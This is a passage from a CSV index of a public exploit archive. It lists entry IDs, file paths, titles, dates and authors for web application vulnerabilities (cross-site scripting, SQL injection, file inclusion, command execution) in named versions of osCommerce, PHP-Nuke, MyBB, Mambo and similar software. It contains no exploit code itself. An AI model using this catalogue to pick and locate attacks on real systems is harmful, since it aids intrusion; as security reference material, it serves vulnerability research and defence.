Scripting",2003-08-04,"Lorenzo Hernandez Garcia-Hierro",php,webapps, -22990,exploits/php/webapps/22990.txt,"vBulletin 3.0 - 'register.php' HTML Injection",2003-08-06,"Ferruh Mavituna",php,webapps, -22992,exploits/asp/webapps/22992.txt,"IdealBB 1.4.9 - 'error.asp' Cross-Site Scripting",2003-08-07,G00db0y,asp,webapps, -22995,exploits/php/webapps/22995.txt,"C-Cart 1.0 - Full Path Disclosure",2003-08-08,G00db0y,php,webapps, -22997,exploits/php/webapps/22997.txt,"PostNuke 0.6/0.7 Downloads Module - TTitle Cross-Site Scripting",2003-08-08,"Lorenzo Hernandez Garcia-Hierro",php,webapps, -22998,exploits/php/webapps/22998.txt,"PostNuke 0.6/0.7 web_links Module - TTitle Cross-Site Scripting",2003-08-08,"Lorenzo Hernandez Garcia-Hierro",php,webapps, -23000,exploits/php/webapps/23000.txt,"geeeekShop 1.4 - Information Disclosure",2003-08-09,G00db0y,php,webapps, -23001,exploits/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 - 'admin.php' Cross-Site Scripting",2003-08-09,"Boy Bear",php,webapps, -23004,exploits/multiple/webapps/23004.txt,"Oracle OpenSSO 8.0 - Multiple Cross-Site Scripting POST Injection Vulnerabilities",2012-11-29,LiquidWorm,multiple,webapps, -23005,exploits/asp/webapps/23005.txt,"FCKEditor Core ASP 2.6.8 - Arbitrary File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps, -23017,exploits/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module - 'PDA_limit' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps, -23018,exploits/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 - Full Path Disclosure",2003-08-11,"Zone-h Security Team",php,webapps, -23020,exploits/php/webapps/23020.txt,"HostAdmin - Full Path Disclosure",2003-08-12,G00db0y,php,webapps, -23021,exploits/cgi/webapps/23021.txt,"Eudora WorldMail 2.0 - Search Cross-Site Scripting",2003-08-12,"Donnie Werner",cgi,webapps, -23025,exploits/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d - 'User.cgi' Cross-Site Scripting",2003-08-13,"Ziv Kamir",cgi,webapps, -23026,exploits/php/webapps/23026.txt,"Xoops 1.0/1.3.x - BBCode HTML Injection",2003-08-13,frog,php,webapps, -23027,exploits/php/webapps/23027.txt,"HolaCMS 1.2.x - 'HTMLtags.php' Local File Inclusion",2003-08-13,"Virginity Security",php,webapps, -23028,exploits/php/webapps/23028.txt,"Free Hosting Manager 2.0 - 'id' SQL Injection",2012-11-30,"Yakir Wizman",php,webapps, -23029,exploits/php/webapps/23029.txt,"SmartCMS - '/index.php?menuitem' SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",php,webapps, -23032,exploits/asp/webapps/23032.txt,"Clickcess ChitChat.NET - name Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps, -23033,exploits/asp/webapps/23033.txt,"Clickcess ChitChat.NET - topic title Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps, -23031,exploits/php/webapps/23031.txt,"Silverstripe CMS 3.0.2 - Multiple Vulnerabilities",2012-11-30,"Sense of Security",php,webapps, -23039,exploits/php/webapps/23039.txt,"Fusion News 3.3 - Unauthorized Account Addition",2003-08-18,DarkKnight,php,webapps, -23055,exploits/asp/webapps/23055.txt,"IdealBB 1.4.9 Beta - HTML Injection",2003-08-23,"Scott M",asp,webapps, -23057,exploits/php/webapps/23057.txt,"newsPHP 216 - Remote File Inclusion",2003-08-25,Officerrr,php,webapps, -23058,exploits/php/webapps/23058.txt,"newsPHP 216 - Authentication Bypass",2003-08-25,Officerrr,php,webapps, -23059,exploits/cgi/webapps/23059.txt,"Netbula Anyboard 9.9.5 6 - Information Disclosure",2003-08-25,"cyber talon",cgi,webapps, -23060,exploits/php/webapps/23060.txt,"Py-Membres 4.x - 'Secure.php' Unauthorized Access",2003-08-26,frog,php,webapps, -23061,exploits/php/webapps/23061.txt,"Py-Membres 4.x - 'Pass_done.php' SQL Injection",2003-08-26,frog,php,webapps, -23064,exploits/php/webapps/23064.txt,"Attila PHP 3.0 - SQL Injection Unauthorized Privileged Access",2003-08-26,frog,php,webapps, -23065,exploits/php/webapps/23065.txt,"AldWeb MiniPortail 1.9/2.x - 'LNG' Cross-Site Scripting",2003-08-27,"Bahaa Naamneh",php,webapps, -23067,exploits/php/webapps/23067.txt,"eNdonesia 8.2/8.3 - 'Mod' Cross-Site Scripting",2003-08-27,"Bahaa Naamneh",php,webapps, -23072,exploits/php/webapps/23072.txt,"Ezboard - 'invitefriends.php3' Cross-Site Scripting",2003-09-01,"David F. Madrid",php,webapps, -23084,exploits/php/webapps/23084.txt,"TSguestbook 2.1 - 'Message' HTML Injection",2003-09-01,Trash-80,php,webapps, -23085,exploits/cgi/webapps/23085.html,"Sitebuilder 1.4 - 'sitebuilder.cgi' Directory Traversal",2003-09-01,"Zero X",cgi,webapps, -23099,exploits/php/webapps/23099.txt,"WebCalendar 0.9.x (Multiple Modules) - SQL Injection",2003-09-03,noconflic,php,webapps, -23103,exploits/php/webapps/23103.txt,"Digital Scribe 1.x - Error Function Cross-Site Scripting",2003-09-05,Secunia,php,webapps, -23105,exploits/php/webapps/23105.txt,"MyBB KingChat Plugin - SQL Injection",2012-12-03,Red_Hat,php,webapps, -23106,exploits/php/webapps/23106.txt,"SchoolCMS - Persistent Cross-Site Scripting",2012-12-03,VipVince,php,webapps, -23109,exploits/multiple/webapps/23109.txt,"Symantec Messaging Gateway 9.5.3-3 - Cross-Site Request Forgery",2012-12-03,"Ben Williams",multiple,webapps, -23110,exploits/linux/webapps/23110.txt,"Symantec Messaging Gateway 9.5.3-3 - Arbitrary File Download",2012-12-03,"Ben Williams",linux,webapps, -23111,exploits/multiple/webapps/23111.txt,"FirePass SSL VPN - Unauthenticated Local File Inclusion",2012-12-03,"SEC Consult",multiple,webapps, -23120,exploits/asp/webapps/23120.txt,"ICQ 2003 - Webfront Guestbook Cross-Site Scripting",2003-09-08,"Donnie Werner",asp,webapps, -23125,exploits/php/webapps/23125.txt,"phpBB 2.0.6 - URL BBCode HTML Injection",2003-09-08,keupon_ps2,php,webapps, -23127,exploits/cgi/webapps/23127.txt,"Escapade 0.2.1 Beta Scripting Engine - 'PAGE' Cross-Site Scripting",2003-09-09,"Bahaa Naamneh",cgi,webapps, -23128,exploits/cgi/webapps/23128.txt,"Escapade 0.2.1 Beta Scripting Engine - 'PAGE' Full Path Disclosure",2003-09-09,"Bahaa Naamneh",cgi,webapps, -23129,exploits/php/webapps/23129.txt,"Invision Power Board 1.x - 'index.php' showtopic Cross-Site Scripting",2003-09-09,"Boy Bear",php,webapps, -23132,exploits/windows/webapps/23132.py,"Advantech Studio 7.0 - SCADA/HMI Directory Traversal",2012-12-04,Nin3,windows,webapps, -23140,exploits/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 - Authenticated SQL Injection",2003-09-12,frog,php,webapps, -23153,exploits/cgi/webapps/23153.txt,"NetWin DBabble 2.5 i - Cross-Site Scripting",2003-09-16,dr_insane,cgi,webapps, -23158,exploits/php/webapps/23158.txt,"Mambo Site Server 4.0.14 - 'banners.php?bid' SQL Injection",2003-09-18,"Lifo Fifo",php,webapps, -23159,exploits/php/webapps/23159.txt,"Mambo Site Server 4.0.14 - 'emailarticle.php?id' SQL Injection",2003-09-18,"Lifo Fifo",php,webapps, -23160,exploits/php/webapps/23160.txt,"Mambo Site Server 4.0.14 - 'contact.php' Unauthorized Mail Relay",2003-09-18,"Lifo Fifo",php,webapps, -23163,exploits/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information Disclosure",2003-09-19,"H Zero Seven",php,webapps, -23164,exploits/php/webapps/23164.txt,"myPHPNuke 1.8.8 - 'auth.inc.php' SQL Injection",2003-09-20,"Lifo Fifo",php,webapps, -40403,exploits/php/webapps/40403.txt,"Dolphin 7.3.0 - Error-Based SQL Injection",2016-09-20,"Kacper Szurek",php,webapps,80 -23175,exploits/php/webapps/23175.txt,"yMonda Thread-IT 1.6 - Multiple HTML Injections",2003-09-24,"Bahaa Naamneh",php,webapps, -23180,exploits/php/webapps/23180.txt,"Kordil EDms 2.2.60rc3 - SQL Injection",2012-12-06,"Woody Hughes",php,webapps, -23184,exploits/windows/webapps/23184.txt,"Software602 602Pro LAN SUITE 2003 - Sensitive User Information Storage",2003-09-25,"Phuong Nguyen",windows,webapps, -23192,exploits/php/webapps/23192.txt,"GuppY 2.4 - HTML Injection",2003-09-29,"David Suzanne",php,webapps, -23193,exploits/php/webapps/23193.txt,"Geeklog 1.3.x - SQL Injection",2003-09-29,"Lorenzo Hernandez Garcia-Hierro",php,webapps, -23194,exploits/php/webapps/23194.txt,"Geeklog 1.3.x - Cross-Site Scripting",2003-09-29,"Lorenzo Hernandez Garcia-Hierro",php,webapps, -23195,exploits/asp/webapps/23195.txt,"Alan Ward A-Cart 2.0 - MSG Cross-Site Scripting",2003-09-29,G00db0y,asp,webapps, -23202,exploits/freebsd/webapps/23202.txt,"m0n0wall 1.33 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-12-07,"Yann CAM",freebsd,webapps, -23205,exploits/php/webapps/23205.txt,"DCP-Portal 5.5 - 'advertiser.php?Password' SQL Injection",2003-10-01,"Lifo Fifo",php,webapps, -23206,exploits/php/webapps/23206.txt,"DCP-Portal 5.5 - 'lostpassword.php?email' SQL Injection",2003-10-01,"Lifo Fifo",php,webapps, -23207,exploits/php/webapps/23207.txt,"Atrise Everyfind 5.0.2 - search Cross-Site Scripting",2003-10-01,Ezhilan,php,webapps, -23208,exploits/php/webapps/23208.txt,"mpnews pro 2.1.0.18 - Directory Traversal Information Disclosure",2003-10-01,"Gama Sec",php,webapps, -23213,exploits/php/webapps/23213.txt,"WordPress 0.6/0.7 - 'Blog.header.php' SQL Injection",2003-10-03,"Seth Woolley",php,webapps, -23214,exploits/cgi/webapps/23214.txt,"Sun Cobalt RaQ 1.1/2.0/3.0/4.0 - 'Message.cgi' Cross-Site Scripting",2003-10-03,"Lorenzo Hernandez Garcia-Hierro",cgi,webapps, -23217,exploits/cgi/webapps/23217.txt,"Divine Content Server 5.0 - Error Page Cross-Site Scripting",2003-10-03,valgasu,cgi,webapps, -23218,exploits/php/webapps/23218.txt,"EternalMart Mailing List Manager 1.32 - Remote File Inclusion",2003-10-04,frog,php,webapps, -23219,exploits/php/webapps/23219.txt,"GuppY 2.4 - Cross-Site Scripting",2003-10-05,frog,php,webapps, -23220,exploits/php/webapps/23220.txt,"GuppY 2.4 - Remote File Access",2003-10-05,frog,php,webapps, -23232,exploits/php/webapps/23232.txt,"PayPal Store Front 3.0 - 'index.php' Remote File Inclusion",2003-10-08,"Zone-h Security Team",php,webapps, -23233,exploits/php/webapps/23233.txt,"GeekLog 1.3.x - HTML Injection",2003-10-08,Jelmer,php,webapps, -23237,exploits/php/webapps/23237.pl,"PHP-Nuke 6.6 - 'admin.php' SQL Injection",2003-10-08,1dt.w0lf,php,webapps, -23238,exploits/php/webapps/23238.txt,"Gallery 1.4 - 'index.php' Remote File Inclusion",2003-10-11,peter,php,webapps, -23244,exploits/php/webapps/23244.txt,"WrenSoft Zoom Search Engine 2.0 Build: 1018 - Cross-Site Scripting",2003-10-14,Ezhilan,php,webapps, -23249,exploits/php/webapps/23249.txt,"MyBB KingChat Plugin - Persistent Cross-Site Scripting",2012-12-09,VipVince,php,webapps, -23250,exploits/hardware/webapps/23250.txt,"Cisco DPC2420 - Multiples Vulnerabilities",2012-12-09,"Facundo M. de la Cruz",hardware,webapps, -23252,exploits/php/webapps/23252.txt,"Clipbucket 2.6 Revision 738 - Multiple SQL Injections",2012-12-09,"High-Tech Bridge SA",php,webapps, -23253,exploits/php/webapps/23253.txt,"Achievo 1.4.5 - Multiple Vulnerabilities (2)",2012-12-09,"High-Tech Bridge SA",php,webapps, -23256,exploits/cfm/webapps/23256.txt,"Macromedia ColdFusion MX 6.0 - SQL Error Message Cross-Site Scripting",2003-10-15,"Lorenzo Hernandez Garcia-Hierro",cfm,webapps, -23259,exploits/php/webapps/23259.txt,"GoldLink 3.0 - Cookie SQL Injection",2003-10-18,Weke,php,webapps, -23260,exploits/php/webapps/23260.sh,"Geeklog 1.3.8 - Forgot Password SQL Injection",2003-10-19,"Jouko Pynnonen",php,webapps, -23261,exploits/php/webapps/23261.txt,"Bytehoard 0.7 - File Disclosure",2003-10-20,Ezhilan,php,webapps, -23262,exploits/jsp/webapps/23262.txt,"Caucho Resin 2.0/2.1 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2003-10-20,"Donnie Werner",jsp,webapps, -23264,exploits/php/webapps/23264.txt,"DeskPro 1.1 - Multiple SQL Injections",2003-10-20,"Aviram Jenik",php,webapps, -23266,exploits/cgi/webapps/23266.txt,"Dansie Shopping Cart - Server Error Message Installation Full Path Disclosure",2003-10-20,Dr_Ponidi,cgi,webapps, -23268,exploits/java/webapps/23268.txt,"Vivisimo Clustering Engine - Search Script Cross-Site Scripting",2003-10-21,ComSec,java,webapps, -23269,exploits/php/webapps/23269.txt,"FuzzyMonkey 2.11 - MyClassifieds Email Variable SQL Injection",2003-10-21,Ezhilan,php,webapps, -23275,exploits/cgi/webapps/23275.txt,"DansGuardian 2.2.x - Denied URL Cross-Site Scripting",2003-10-22,"Richard Maudsley",cgi,webapps, -23284,exploits/php/webapps/23284.txt,"MyBB Bank- 3 Plugin - SQL Injection",2012-12-11,Red_Hat,php,webapps, -23286,exploits/php/webapps/23286.txt,"Joomla! Component com_jooproperty 1.13.0 - Multiple Vulnerabilities",2012-12-11,D4NB4R,php,webapps, -23287,exploits/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps, -23289,exploits/php/webapps/23289.txt,"PHP-Nuke 8.2.4 - Cross-Site Request Forgery",2012-12-11,sajith,php,webapps, -23313,exploits/php/webapps/23313.txt,"Ledscripts LedForums - Multiple HTML Injections",2003-10-30,ProXy,php,webapps, -23294,exploits/php/webapps/23294.txt,"Chi Kien Uong Guestbook 1.51 - Cross-Site Scripting",2003-10-27,"Joshua P. Miller",php,webapps, -23302,exploits/php/webapps/23302.txt,"Les Visiteurs 2.0 - Remote File Inclusion",2003-10-27,"Matthieu Peschaud",php,webapps, -23315,exploits/jsp/webapps/23315.txt,"BEA WebLogic 6/7/8 - InteractiveQuery.jsp Cross-Site Scripting",2003-10-31,"Corsaire Limited",jsp,webapps, -23319,exploits/php/webapps/23319.txt,"Tritanium Scripts Tritanium Bulletin Board 1.2.3 - Unauthorized Access",2003-10-31,"Virginity Security",php,webapps, -23322,exploits/php/webapps/23322.txt,"TipsOfTheDay MyBB Plugin - Multiple Vulnerabilities",2012-12-12,VipVince,php,webapps, -23324,exploits/windows/webapps/23324.txt,"Axway Secure Transport 5.1 SP2 - Directory Traversal",2012-12-12,"Sebastian Perez",windows,webapps, -23326,exploits/asp/webapps/23326.txt,"http commander 4.0 - Directory Traversal",2003-11-01,"Zero X",asp,webapps, -23330,exploits/php/webapps/23330.txt,"Synthetic Reality SymPoll 1.5 - Cross-Site Scripting",2003-11-03,"Michael Frame",php,webapps, -23331,exploits/asp/webapps/23331.txt,"Web Wiz Forum 6.34/7.0/7.5 - Unauthorized Private Forum Access",2003-11-03,"Alexander Antipov",asp,webapps, -23332,exploits/cgi/webapps/23332.txt,"MPM Guestbook 1.2 - Cross-Site Scripting",2003-11-03,"David Ferreira",cgi,webapps, -23333,exploits/php/webapps/23333.txt,"PHPKit 1.6 - 'Include.php' Cross-Site Scripting",2003-11-02,ben.moeckel@badwebmasters.net,php,webapps, -23335,exploits/asp/webapps/23335.txt,"VieNuke VieBoard 2.6 - SQL Injection",2003-11-03,ekerazha@yahoo.it,asp,webapps, -23336,exploits/php/webapps/23336.txt,"OpenAutoClassifieds 1.0 - 'Listing' Cross-Site Scripting",2003-11-04,"David Sopas Ferreira",php,webapps, -23338,exploits/php/webapps/23338.txt,"John Beatty Easy PHP Photo Album 1.0 - 'dir' HTML Injection",2003-11-04,nimber@designer.ru,php,webapps, -23353,exploits/php/webapps/23353.txt,"MyYoutube MyBB Plugin 1.0 - SQL Injection",2012-12-13,Zixem,php,webapps, -23354,exploits/php/webapps/23354.txt,"MyBB AJAX Chat - Persistent Cross-Site Scripting",2012-12-13,"Mr. P-teo",php,webapps, -23355,exploits/php/webapps/23355.txt,"Facebook Profile MyBB Plugin 2.4 - Persistent Cross-Site Scripting",2012-12-13,limb0,php,webapps, -23356,exploits/php/webapps/23356.txt,"WordPress Plugin Portable phpMyAdmin - Authentication Bypass",2012-12-13,"Mark Stanislav",php,webapps, -23384,exploits/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion",2003-11-17,"RusH security team",php,webapps, -23382,exploits/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,php,webapps, -23386,exploits/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 - Cross-Site Scripting",2003-11-17,"David Sopas Ferreira",php,webapps, -23359,exploits/php/webapps/23359.txt,"MyBB DyMy User Agent Plugin - 'newreply.php' SQL Injection",2012-12-13,JoinSe7en,php,webapps, -23362,exploits/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3 < 2.3.9-4 - Blind SQL Injection",2012-12-13,modpr0be,php,webapps, -23363,exploits/php/webapps/23363.txt,"phpBB 2.0.x - 'profile.php' SQL Injection",2003-11-08,JOCANOR,php,webapps, -23367,exploits/cgi/webapps/23367.txt,"OnlineArts DailyDose 1.1 - 'dose.pl' Remote Command Execution",2003-11-10,Don_Huan,cgi,webapps, -23370,exploits/cgi/webapps/23370.txt,"ncube server manager 1.0 - Directory Traversal",2003-11-10,"Beck Mr.R",cgi,webapps, -23372,exploits/php/webapps/23372.txt,"PHP-Coolfile 1.4 - Unauthorized Administrative Access",2003-11-11,r00t@rsteam.ru,php,webapps, -23381,exploits/php/webapps/23381.txt,"PHPWebFileManager 2.0 - 'index.php' Directory Traversal",2003-11-17,"RusH security team",php,webapps, -23395,exploits/cgi/webapps/23395.txt,"CommerceSQL Shopping Cart 2.2 - 'index.cgi' Directory Traversal",2003-11-24,"Mariusz Ciesla",cgi,webapps, -23402,exploits/jsp/webapps/23402.txt,"Macromedia JRun 4.0 build 61650 - Administrative Interface Multiple Cross-Site Scripting Vulnerabilities",2003-11-26,dr_insane,jsp,webapps, -23403,exploits/php/webapps/23403.pl,"My_eGallery Module 3.1.1 - Remote File Inclusion Command Injection",2003-11-26,"Bojan Zdrnja",php,webapps, -23406,exploits/php/webapps/23406.txt,"CuteNews 1.3 - Debug Query Information Disclosure",2003-12-01,scrap,php,webapps, -23407,exploits/asp/webapps/23407.txt,"Virtual Programming VP-ASP 4.00/5.00 - 'shopsearch.asp' SQL Injection",2003-12-01,"Nick Gudov",asp,webapps, -23408,exploits/asp/webapps/23408.txt,"Virtual Programming VP-ASP 4.00/5.00 - 'shopdisplayproducts.asp' SQL Injection",2003-12-01,"Nick Gudov",asp,webapps, -23409,exploits/cgi/webapps/23409.c,"Jason Maloney's Guestbook 3.0 - Remote Command Execution",2003-12-01,shaun2k2,cgi,webapps, -23410,exploits/cgi/webapps/23410.txt,"IBM Directory Server 4.1 - Web Administration Interface Cross-Site Scripting",2003-12-02,"Oliver Karow",cgi,webapps, -23415,exploits/asp/webapps/23415.txt,"Virtual Programming VP-ASP 4/5 - 'shopdisplayproducts.asp' Cross-Site Scripting",2003-12-05,"Xnuxer Research",asp,webapps, -23416,exploits/php/webapps/23416.txt,"Xoops 1.3.x/2.0.x - Multiple Vulnerabilities",2003-12-06,frog,php,webapps, -23418,exploits/cgi/webapps/23418.pl,"Webgate WebEye - Information Disclosure",2003-12-08,datapath,cgi,webapps, -23420,exploits/php/webapps/23420.txt,"Bitfolge Snif 1.2.6 - 'index.php' Path Cross-Site Scripting",2003-12-09,"Justin Hagstrom",php,webapps, -23421,exploits/cgi/webapps/23421.txt,"calacode @mail webmail system 3.52 - Multiple Vulnerabilities",2003-12-09,"Nick Gudov",cgi,webapps, -23425,exploits/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 - Persistent Cross-Site Scripting",2012-12-16,limb0,php,webapps, -23428,exploits/php/webapps/23428.html,"Mambo 4.5 Server - 'user.php' Script Unauthorized Access",2003-12-10,frog,php,webapps, -23429,exploits/php/webapps/23429.txt,"Mambo Open Source 4.0.14 Server - SQL Injection",2003-12-10,"Chintan Trivedi",php,webapps, -23430,exploits/php/webapps/23430.txt,"Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injections",2003-12-10,frog,php,webapps, -23432,exploits/cgi/webapps/23432.txt,"RemotelyAnywhere - Default.HTML Logout Message Injection",2003-12-11,"Oliver Karow",cgi,webapps, -23434,exploits/php/webapps/23434.pl,"osCommerce 2.2 - SQL Injection",2003-12-13,JeiAr,php,webapps, -23440,exploits/asp/webapps/23440.txt,"elektropost episerver 3/4 - Multiple Vulnerabilities",2003-12-15,babbelbubbel,asp,webapps, -23443,exploits/php/webapps/23443.txt,"Aardvark Topsites 4.1 PHP - Multiple Vulnerabilities",2003-12-16,JeiAr,php,webapps, -23445,exploits/php/webapps/23445.txt,"osCommerce 2.2 - 'osCsid' Cross-Site Scripting",2003-12-17,JeiAr,php,webapps, -23447,exploits/cgi/webapps/23447.txt,"SiteInteractive Subscribe Me - Setup.pl Arbitrary Command Execution",2003-12-18,"Paul Craig",cgi,webapps, -23448,exploits/php/webapps/23448.php,"PHPWCMS 1.5.4.6 - 'preg_replace' Multiple Vulnerabilities",2012-12-17,aeon,php,webapps, -23453,exploits/php/webapps/23453.txt,"BES-CMS 0.4/0.5 - 'index.inc.php' File Inclusion",2003-12-20,frog,php,webapps, -23454,exploits/php/webapps/23454.txt,"BES-CMS 0.4/0.5 - '/members/index.inc.php' File Inclusion",2003-12-20,frog,php,webapps, -23455,exploits/php/webapps/23455.txt,"BES-CMS 0.4/0.5 - 'message.php' File Inclusion",2003-12-20,frog,php,webapps, -23456,exploits/php/webapps/23456.txt,"BES-CMS 0.4/0.5 - 'start.php' File Inclusion",2003-12-20,frog,php,webapps, -23457,exploits/php/webapps/23457.txt,"BES-CMS 0.4/0.5 - 'folder.php' File Inclusion",2003-12-20,frog,php,webapps, -23458,exploits/php/webapps/23458.txt,"BES-CMS 0.4/0.5 - 'hacking.php' File Inclusion",2003-12-20,frog,php,webapps, -23459,exploits/php/webapps/23459.txt,"Xoops 2.0.5.1 - 'MyLinks Myheader.php' Cross-Site Scripting",2003-12-21,"Chintan Trivedi",php,webapps, -23462,exploits/php/webapps/23462.txt,"osCommerce 2.2 - 'products_id' SQL Injection",2003-12-22,JeiAr,php,webapps, -23463,exploits/php/webapps/23463.txt,"osCommerce 2.2 - 'manufacturers_id' Cross-Site Scripting",2003-12-22,JeiAr,php,webapps, -23466,exploits/cgi/webapps/23466.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - 'store' Full Path Disclosure",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps, -23467,exploits/cgi/webapps/23467.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - 'template' Directory Traversal",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps, -23629,exploits/cgi/webapps/23629.txt,"Leif M. Wright Web Blog 1.1 - Remote Command Execution",2004-01-31,ActualMInd,cgi,webapps, -23631,exploits/php/webapps/23631.txt,"PHP-Nuke 6.x (Multiple Modules) - SQL Injection",2004-02-02,"Security Corporation",php,webapps, -23473,exploits/php/webapps/23473.txt,"My Little Forum 1.3 - 'email.php' Cross-Site Scripting",2003-12-23,"David S. Ferreira",php,webapps, -23474,exploits/php/webapps/23474.txt,"Webfroot Shoutbox 2.32 - 'Viewshoutbox.php' Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps, -23475,exploits/php/webapps/23475.txt,"phpBB 2.0.6 - 'privmsg.php' Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps, -23476,exploits/php/webapps/23476.txt,"KnowledgeBuilder 2.0/2.1/3.0 - Remote File Inclusion",2003-12-24,"Zero X",php,webapps, -23477,exploits/php/webapps/23477.txt,"Psychoblogger PB-beta1 - 'desc' Cross-Site Scripting",2003-12-24,"Andrew Smith",php,webapps, -23478,exploits/php/webapps/23478.txt,"Psychoblogger PB-beta1 - errormessage Cross-Site Scripting",2003-12-24,"Andrew Smith",php,webapps, -23483,exploits/php/webapps/23483.txt,"OpenBB 1.0 - 'board.php' Cross-Site Scripting",2003-12-27,gr00vy,php,webapps, -23484,exploits/php/webapps/23484.txt,"PHP-Nuke 6.x/7.0 Survey Module - SQL Injection",2003-12-27,idtwolf@pisem.net,php,webapps, -23485,exploits/cgi/webapps/23485.txt,"L-Soft 1.8 - Listserv Multiple Cross-Site Scripting Vulnerabilities",2003-12-26,http-equiv,cgi,webapps, -23486,exploits/php/webapps/23486.txt,"Private Message System 2.x - 'index.php?Page' Cross-Site Scripting",2003-12-27,"David S. Ferreira",php,webapps, -23487,exploits/php/webapps/23487.txt,"PHP-ping - 'Count' Command Execution",2003-12-29,ppp-design,php,webapps, -23488,exploits/cgi/webapps/23488.txt,"BulletScript MailList - bsml.pl Information Disclosure",2003-12-29,M0rf,cgi,webapps, -23494,exploits/php/webapps/23494.txt,"WordPress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload",2012-12-19,DigiP,php,webapps, -23630,exploits/php/webapps/23630.txt,"Aprox Portal 3.0 - File Disclosure",2004-01-31,"Zero X",php,webapps, -23498,exploits/hardware/webapps/23498.txt,"SonicWALL SonicOS 5.8.1.8 WAF - Cross-Site Scripting",2012-12-19,Vulnerability-Lab,hardware,webapps, -23499,exploits/hardware/webapps/23499.txt,"Enterpriser16 Load Balancer 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-12-19,Vulnerability-Lab,hardware,webapps, -23628,exploits/php/webapps/23628.txt,"JBrowser 1.0/2.x - Unauthorized Admin Access",2004-01-30,"Himeur Nourredine",php,webapps, -23507,exploits/php/webapps/23507.txt,"EasyDynamicPages 1.0 - 'config_page.php' PHP Remote File Inclusion",2004-01-02,tsbeginnervn,php,webapps, -23513,exploits/php/webapps/23513.txt,"Athena Web Registration - Remote Command Execution",2004-01-02,"Peter Kieser",php,webapps, -23515,exploits/asp/webapps/23515.txt,"ASPApp PortalApp - Remote User Database Access",2004-01-04,newbie6290,asp,webapps, -23516,exploits/asp/webapps/23516.txt,"ASP-Nuke 1.0/1.2/1.3 - Remote User Database Access",2004-01-04,"Vietnamese Security Group",asp,webapps, -23517,exploits/php/webapps/23517.txt,"HotNews 0.x - 'hotnews-engine.inc.php3?config[header]' Remote File Inclusion",2004-01-05,Officerrr,php,webapps, -23518,exploits/php/webapps/23518.txt,"HotNews 0.x - 'config[incdir]' Remote File Inclusion",2004-01-05,Officerrr,php,webapps, -23519,exploits/php/webapps/23519.txt,"FreznoShop 1.2.3/1.3 - Search Script Cross-Site Scripting",2004-01-04,"David S. Ferreira",php,webapps, -23520,exploits/php/webapps/23520.txt,"PHPGedView 2.61 - Multiple Remote File Inclusions",2004-01-06,Windak,php,webapps, -23691,exploits/php/webapps/23691.txt,"vBulletin 3.0 - 'search.php' Cross-Site Scripting",2004-02-13,"Rafel Ivgi The-Insider",php,webapps, -23525,exploits/php/webapps/23525.txt,"PhpGedView 2.61 - Search Script Cross-Site Scripting",2004-01-06,Windak,php,webapps, -23526,exploits/php/webapps/23526.txt,"PhpGedView 2.61 - PHPInfo Information Disclosure",2004-01-06,Windak,php,webapps, -23535,exploits/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal",2004-01-10,FIST,cgi,webapps, -23536,exploits/php/webapps/23536.txt,"Andy's PHP Projects Man Page Lookup Script - Information Disclosure",2004-01-10,"Cabezon Aurelien",php,webapps, -23537,exploits/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 - 'module.php' Remote Command Execution",2004-01-10,"Zero X",php,webapps, -23546,exploits/php/webapps/23546.txt,"phpShop Web Shopping Cart 0.6.1 -b - Multiple Function Cross-Site Scripting Vulnerabilities",2004-01-16,JeiAr,php,webapps, -23547,exploits/asp/webapps/23547.txt,"XtremeASP PhotoGallery 2.0 - 'Adminlogin.asp' SQL Injection",2004-01-16,posidron,asp,webapps, -23548,exploits/cgi/webapps/23548.txt,"MetaDot Portal Server 5.6.x - 'index.pl' Multiple SQL Injections",2004-01-16,JeiAr,cgi,webapps, -23549,exploits/cgi/webapps/23549.txt,"MetaDot Portal Server 5.6.x - index.pl Information Disclosure",2004-01-16,JeiAr,cgi,webapps, -23550,exploits/cgi/webapps/23550.txt,"MetaDot Portal Server 5.6.x - 'index.pl' Multiple Cross-Site Scripting Vulnerabilities",2004-01-16,JeiAr,cgi,webapps, -23551,exploits/cgi/webapps/23551.txt,"MetaDot Portal Server 5.6.x - 'userchannel.pl?op' Cross-Site Scripting",2004-01-16,JeiAr,cgi,webapps, -23553,exploits/php/webapps/23553.php,"Mambo Open Source 4.5/4.6 - 'mod_mainmenu.php' Remote File Inclusion",2004-01-19,Yo_Soy,php,webapps, -23554,exploits/php/webapps/23554.java,"YABB SE 1.x - 'SSI.php' ID_MEMBER SQL Injection",2004-01-19,BaCkSpAcE,php,webapps, -23558,exploits/php/webapps/23558.txt,"PHPix 2.0.3 - Arbitrary Command Execution",2004-01-20,"Max Stepanov",php,webapps, -23561,exploits/asp/webapps/23561.txt,"DUware Software - Multiple Vulnerabilities",2004-01-20,"Security 